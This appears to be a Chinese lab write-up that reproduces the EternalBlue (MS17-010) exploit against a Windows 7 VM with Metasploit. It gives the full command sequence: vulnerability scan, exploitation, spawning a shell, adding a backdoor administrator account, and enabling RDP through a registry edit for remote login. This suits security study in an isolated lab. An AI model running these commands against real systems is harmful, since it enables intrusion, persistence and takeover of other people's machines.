MS17010漏洞复现和利用

相关环境

攻击机:Kali-linux 2023.2a
靶机:Windows 7 SP1旗舰版

获取靶机IP地址

打开cmd查看ip地址

1
ipconfig

image-20210203202706412.png

关闭防火墙,检查通讯状态

需要关闭靶机的防火墙

打开网络和共享中心

image-20210203202834222.png

进入windows防火墙设置

image-20210203202906298.png

image-20210203202932655.png

image-20210203203001386.png

成功关闭防火墙

image-20210203203502759.png

检查通讯状况

在kali linux里

1
ping 192.168.137.130

image-20210203203604876.png

在windows 7里

1
ping 192.168.137.128

image-20210203203622717.png

两边都ping得通,说明通讯正常

攻击步骤

检查是否存在漏洞

运行postgresql数据库

1
service postgresql start

打开msf

1
msfconsole

image-20210203203739927.png

使用相关模块

1
use  auxiliary/scanner/smb/smb_ms17_010

查看相关配置信息

1
show options

设置目标IP为靶机的IP

1
set rhost 192.168.137.130

开始对靶机进行扫描

1
run 

image-20210203205501575.png

发现漏洞并攻击

搜索msf17010漏洞模块

1
search ms17-010

使用该漏洞模块进行攻击

1
use exploit/windows/smb/ms17_010_eternalblue 

查看其配置详情

1
show options

image-20210203210021392.png

设置靶机IP

1
set rhost 192.168.137.130

使用exploit或者run命令进行攻击

1
exploit

image-20210203210234736.png

获取shell

1
shell

image-20210203210346744.png

利用漏洞提权

创建管理员账户

1
net user pigpig 123456 /add

我们在win7那边已经可以看到了

image-20210203210657648.png

增加管理员权限

1
net localgroup administrators pigpig /add

image-20210203210709099.png

在去win7那边观察

image-20210203210749459.png

开启3389端口并远程访问控制

将win7靶机那边远程服务打开

1
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

image-20210203210855974.png

打开3389端口之后,在新的shell里

1
rdesktop 192.168.137.130:3389

image-20210203212734846.png

点击yes之后,就可以在kali里面进入到win7靶机了。

image-20210203212755623.png

image-20210203212858622.png

输入账户密码回车,点了同意靶机的管理员账户就会掉线

image-20210203212916039.png

成功进入了

image-20210203213041501.png